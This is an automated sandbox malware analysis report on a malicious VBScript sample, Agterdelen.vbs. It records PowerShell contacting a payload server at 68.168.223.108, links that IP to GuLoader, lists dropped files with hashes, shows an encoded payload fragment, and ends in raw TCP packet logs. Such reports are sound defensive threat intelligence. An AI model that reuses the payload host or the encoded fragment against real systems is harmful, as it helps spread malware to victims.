                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://68.168.223.108/JDpowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://68.168.223.108/JD/Gpowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    68.168.223.108
                                    		unknownUnited States
                                    		19318IS-AS-1USfalse

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1665610
                                    Start date and time:2025-04-15 17:34:02 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Agterdelen.vbs
                                    Detection:MAL
                                    Classification:mal96.troj.expl.evad.winVBS@6/9@0/1
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.76.34.6, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:35:10API Interceptor1x Sleep call for process: wscript.exe modified
                                    11:35:12API Interceptor76x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    68.168.223.108https://workdrive.zohoexternal.com/external/b63c3fc869a1c3feb821637810b1254e8fc2cef6b6cf3da88344ebd42bba45f5/downloadGet hashmaliciousGuLoaderBrowse
                                    • 68.168.223.108/otot/Censurerings.mdp

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    bg.microsoft.map.fastly.netoriginal.emlGet hashmaliciousGabagoolBrowse
                                    • 199.232.214.172
                                    PURCHASE OKK.vbsGet hashmaliciousFormBookBrowse
                                    • 199.232.210.172
                                    nK8noQeiXl.exeGet hashmaliciousHTMLPhisher, CryptOne, LummaC Stealer, Socks5Systemz, TofseeBrowse
                                    • 199.232.210.172
                                    SecuriteInfo.com.Win32.MalwareX-gen.14672.5040.exeGet hashmaliciousFormBookBrowse
                                    • 199.232.210.172
                                    https://degrgd.dailyenglish.it.com/ODIWCBlbGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                    • 199.232.214.172
                                    Fatura.pdfGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    728-3512-19.htaGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    Scanned Page(s).pdfGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    888.exeGet hashmaliciousGO BackdoorBrowse
                                    • 199.232.214.172
                                    exe.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                    • 199.232.214.172

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    IS-AS-1USset.msiGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
                                    • 64.20.61.146
                                    https://manhuaus.org/Get hashmaliciousUnknownBrowse
                                    • 216.219.92.22
                                    http://httpswwwstatregerhegergrtodayr.rolinfo.de/4pjFho170689Jahf960ulhnbgpcjo1454QYTQGMFVRKUYIQV11812YOJV712361h21Get hashmaliciousUnknownBrowse
                                    • 216.219.92.22
                                    Alphabet Soup Part B.docxGet hashmaliciousUnknownBrowse
                                    • 216.219.92.22
                                    MY TAX FORMS & ORGANIZER 2024.zipGet hashmaliciousAsyncRATBrowse
                                    • 67.211.208.99
                                    JavaUpdater943034.dllGet hashmaliciousRemcosBrowse
                                    • 173.225.103.138
                                    https://i.imgur.com/ZC2vWmL.pngGet hashmaliciousUnknownBrowse
                                    • 216.219.92.22
                                    loader.vbsGet hashmaliciousFallen Miner, XmrigBrowse
                                    • 216.219.85.122
                                    s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 162.246.21.236
                                    x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 162.246.21.236

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):73305
                                    Entropy (8bit):7.996028107841645
                                    Encrypted:true
                                    SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                    MD5:83142242E97B8953C386F988AA694E4A
                                    SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                    SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                    SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):330
                                    Entropy (8bit):3.2685250519976075
                                    Encrypted:false
                                    SSDEEP:6:kKOmcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:GmfZkPlE99SNxAhUeq8S
                                    MD5:616D22DC728A7FCFCEDACC9243E0DB17
                                    SHA1:A61DDB2688F7D6A1FEB7F0515C13F5D408F1E0A2
                                    SHA-256:B2DDB9911AEFA7D21DFAFCD15924FDFD19D720A6E319B32BBC57F217F9DE9E0C
                                    SHA-512:1F454B0E7183A46024B2CCCCC99BA0261AC4479E8837F14B43936BA7DA7605F67F769F479F8165E934E8D2F71F0B705FC6E613118838DDB1866BD13248B108DB
                                    Malicious:false
                                    Reputation:low
                                    Preview:p...... ........o.......(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulbnolz:NllUc
                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35qjnlyz.tjh.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx1ophtj.ezb.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jo2gq00w.vkb.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nligp3sw.3lz.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Roaming\Discoach.Imm

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):575624
                                    Entropy (8bit):5.959447843174949
                                    Encrypted:false
                                    SSDEEP:12288:BL9IBGfCvP4na3pDX3rpSu16wIaoW8T3Ryr7HY3+0ShdO/lM:BWB+wAna3xXNSS6wIu8wnO+0SEM
                                    MD5:F5A7E552FB3ED33A282DAE13A76988E8
                                    SHA1:7FA1CE31F1B7E7F9A79CD29DA7E13655C2093138
                                    SHA-256:5DCA81C00DDD42750CDCFDAB287D49E8FAEE6E8C83EF15AAD58CF3EF4823710B
                                    SHA-512:F0AE587AC62D76CB52324976FEAE4F88A0FAB6CB5D679B284AC75923120A9129C7F50CDFE21FC43ABF17E2D863AE15F685FEE04E56D38F7691F4475E19CA37AF
                                    Malicious:false
                                    Preview:u79lGABmIfYDXCQEg88AueUWJjyBwc2nPhSB8bK+ZFBmweAAuhrAFVXA6QAg2zHKg+gAiRQLgMkA0eLB4QCDwQSAwgCB+QFdzwJ84GaB/1JHi0QkBIPyAInDgfn6aP4agcPj6McBBAC6vmAqD4Hyo7ydkoHyHdy3nSwAZoX2iwwQgOsAiQwTZoH+XkxCINuB+qQZBgB15IDDAIlcJAwhwIHtAAMAAIDLAItUJAiAyQCLfCQEkInrhMmBw5wAAACDwwBTZsHnAGpAZoPJAInrZoPzAMeDAAEAAADQ6gKDwgCBwwABAACDzgBTZoPuAInrIfaJuwQBAACQgcMEAQAAwe8AU5Bq/8DhAIPCBZsx9vgxyWYhyYsagflJ2+9VQcHjADkcCnX3ZoPPAEaAygCAfAr7uHXoZoXbi0QK/GaB/ixxKfBmgftLfv/Sgfp0mz5DuqQZBgD8McCF/4t8JAxmhdKBNAc64zOAZj13OYPABMHgADnQdevA6wCJ+5v/15tkhQpYbAgi+CvrREfV6P5qPMWB7lAMbs/SuT6GOmfwRjpr2Il310ipWzafqQs63gA6m7dKqggbTHhFpAp/LbsHq2Qt4TUi/3qLg2hMeEWkCn8tuwerZC3hNSL/eouDaMADJUY5vzrPaDrjM4C/O2gJ32LfiGYTMQH+62pwOLa6ZYM/g826Ot4B0yeDzboILI7oojx7ZjreZlnFiFZYyFd7grzFElm3N9diIEWRqd7qfr469MQ341qMze7L5s0igH3kDcsE6x+yxDfjpHMyEVWPxw4PN9Hppao/nh9ydpY6zb869AXO4jOAAqqNU9HokS46dKAqyNDnl5I6xgGPFzKAOth6Puk/xHb429imYkbkoCfTlJ6Xua4ozl+jq9kWV2neM7TOqNtoRVJwGNBcP8hcnTJyf7cXMoA6lvzB/WaygTrjwY4cX1UF4TrNAZdiMoA6mT6mhjrHayVrgxjtCse83FMsl0X6IbkuKGpi/ksv

                                    Static File Info

                                    General

                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.013311146586393
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Agterdelen.vbs
                                    File size:110'670 bytes
                                    MD5:00aac0b28f4c3970a69309489db29b89
                                    SHA1:3d6214dcc63c9d3ffbfbfd402c62b99697787c69
                                    SHA256:200aa88835a9db6e9af5dad6550e26806ea869ce94b9c8098c68521bf3bc6af4
                                    SHA512:36c75ad67325cde39baa2d3e356c4c1e7f0b2fbcc327086f38223dc186ef8fedb96e60ea3482fd29058a4a509815b7f1d6beac6323eaa70fa7eb4f5f862fcad0
                                    SSDEEP:1536:WPE7cZbcElqomiTKdhkl6JKhJapdgWcxRIt8Z8QbKgjhiHUgMs/LmEtKT:Wbbl1qJKCpdaRIuDbKGiHVhjmEET
                                    TLSH:A3B31E9088D9013799C1679B6DB22A00C6F541B5F13140BEABACAE8BD433F7857F9B74
                                    File Content Preview:..Rem Aarsagen! rgforgiftning: mrkebrun. civilkonomen..Rem Developmentarian jenspejle..Rem Burgjserens. rockcist kasteskyts? afsgningens hypogaeic;..Rem Vrdistemplingen lsrivelsers127: newing dichapetalaceae?..Rem Meropodite svagfres emnearbejdet......Onl

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 15, 2025 17:35:14.664347887 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.792722940 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.792959929 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.793342113 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.936954975 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.936985970 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937000990 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937016010 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937031984 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937047005 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937064886 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937063932 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.937079906 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937093973 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937109947 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:14.937114954 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.937321901 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:14.937321901 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.067766905 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067792892 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067807913 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067821980 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067837000 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067850113 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067864895 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067878008 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067892075 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067903042 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.067903042 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.067907095 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067922115 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067929983 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.067936897 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067950964 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067965031 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067980051 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.067991018 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.067994118 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.068007946 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.068022013 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.068037033 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.068048954 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.068052053 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.068078995 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.068114996 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196511030 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196532965 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196549892 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196631908 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196646929 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196661949 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196675062 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196676016 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196676016 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196690083 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196700096 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196703911 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196718931 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196732998 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196746111 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196748018 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196758986 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196762085 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196775913 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196789980 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196804047 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196806908 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196819067 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196820974 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196836948 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196851015 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196865082 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196876049 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196876049 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196877956 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196892023 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196906090 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196907997 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196921110 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196935892 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196949959 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196962118 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196962118 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196964979 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196981907 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.196995020 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.196995974 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197010040 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197024107 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197037935 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197051048 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197065115 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197066069 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197066069 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197078943 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197093010 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197096109 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197107077 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197108984 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197119951 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197133064 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197139978 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197146893 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.197200060 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.197200060 CEST4971880192.168.2.468.168.223.108
                                    Apr 15, 2025 17:35:15.325103998 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.325133085 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.325148106 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.325165033 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.325218916 CEST804971868.168.223.108192.168.2.4
                                    Apr 15, 2025 17:35:15.325233936 CEST804971868.168.223.108192.168.2.4
